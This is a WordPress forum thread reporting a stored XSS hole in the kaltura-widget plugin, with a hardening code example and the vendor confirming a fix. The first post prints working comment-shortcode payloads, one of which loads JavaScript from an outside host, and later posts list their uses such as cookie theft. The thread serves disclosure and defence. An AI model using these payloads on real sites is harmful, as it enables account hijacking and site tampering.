
kaltura-widget xss security error (9 posts)

  1. kdzwinel
    Member
    Posted 4 years ago #

    I was playing with my friend's WordPress site looking for security vulnerabilities (a little hobby of mine). And I found that I can run any JavaScript code on his site by submitting a comment.

    Showing an alert:
    [kaltura-widget wid='"); alert("ok"); $("xxx' size="comments" /]

    Running code from another server:
    [kaltura-widget wid='"); jQuery.getScript("http://somedomain.com/xss.js"); $("xxx' size="comments" /]

    I guess that it is a bug that should be fixed.
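
    The payload above works because the wid attribute is dropped into a JavaScript string by plain concatenation. The following is an added example (not the kaltura-widget plugin's own code, which is not shown in this thread) of a shortcode renderer that emits the attribute as a proper JS string literal instead; render_widget_script(), loadWidget() and the assumed wid format are hypothetical.

```php
<?php
// Added example: escaping a shortcode attribute that ends up inside an inline
// <script>. The real plugin handler is not on this page; the function names and
// the widget-id format below are assumptions.

// Vulnerable pattern: the attribute value is concatenated straight into a JS
// string literal, so a value starting with "); closes the literal and the call.
function render_widget_script_unsafe(string $wid): string {
    return '<script>loadWidget("' . $wid . '");</script>';
}

// Turn an arbitrary string into a double-quoted JS string literal. The JSON_HEX_*
// flags also hex-encode < > " ' and &, so the literal can never contain a raw
// </script> or a quote that terminates the surrounding markup.
// Inside WordPress, wp_json_encode() wraps json_encode() and accepts the same flags.
function js_string_literal(string $value): string {
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_APOS | JSON_HEX_AMP | JSON_UNESCAPED_SLASHES
    );
}

// Hardened renderer: allow-list the id first (assumed format: letters, digits,
// underscore; adjust to the real id grammar), then emit it as a JS literal.
function render_widget_script(string $wid): string {
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $wid)) {
        return '<!-- kaltura-widget: wid rejected by allow-list -->';
    }
    return '<script>loadWidget(' . js_string_literal($wid) . ');</script>';
}

// Constructed input: the wid value from the comment payload in this thread.
$payload = '"); alert("ok"); $("xxx';

echo "unsafe:   ", render_widget_script_unsafe($payload), "\n";
echo "hardened: ", render_widget_script($payload), "\n";
// Even with the allow-list removed, js_string_literal() keeps the payload inside
// one string argument, where alert() is never reached:
echo "escaped:  <script>loadWidget(", js_string_literal($payload), ");</script>\n";
```

    The allow-list stops the value entirely; the escaping is the defence that still holds when an id grammar cannot be pinned down, so use both.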

  2. Chris_K
    Member
    Posted 4 years ago #

    Check out Submitting_Bugs for some guidance on how to get this in front of developers.

    Thanks!

  3. kdzwinel
    Member
    Posted 4 years ago #

    Thanks for the reply. I don't really have time to read 10 pages on how to submit a bug :) Fortunately, I've found a link to Trac and posted a new ticket. Hope this helps.

  4. scribu
    Member
    Posted 4 years ago #

    You should try to contact the plugin author instead.

    I've tagged this topic so that it's more likely to get seen by other users of the plugin.

  5. kdzwinel
    Member
    Posted 4 years ago #

    Thanks for the reply. I'm sorry for all this mess, but I can't figure out who is responsible for fixing this.

    On the Kaltura site I found 'contact us' and sent them a message, but Kaltura looks like a big portal and the WordPress plugin is only one of 1000 things they are baking.

    Those who use this plugin must be warned because it is a serious security hole. The injected JavaScript can be hidden in an innocent-looking post and do nasty things such as account hijacking (via cookie stealing), removing articles/posts (via calling delete actions when triggered by a logged-in admin), posting spam as a registered user/admin, screwing up the site's look (by manipulating the DOM), etc. Comment moderation is no help; you should disable this plugin.

  6. scribu
    Member
    Posted 4 years ago #

    It's Kaltura's responsibility, since they wrote the plugin to promote their service.

    Since it hasn't been updated in over a year, I don't think it's high on their priority list.

  7. IdoS
    Member
    Posted 4 years ago #

    Hi,

    Definitely our responsibility - it's already in the works. We are updating the plugin on this page.

  8. GPro
    Member
    Posted 4 years ago #

    Any update on this? I looked at the plugin page linked above but it doesn't look like an update has been issued.

    I'd like to use the Kaltura service, but not if there are still security issues.

    Anyone currently using it without issues?

  9. IdoS
    Member
    Posted 4 years ago #

    This issue was fixed in the dev version.
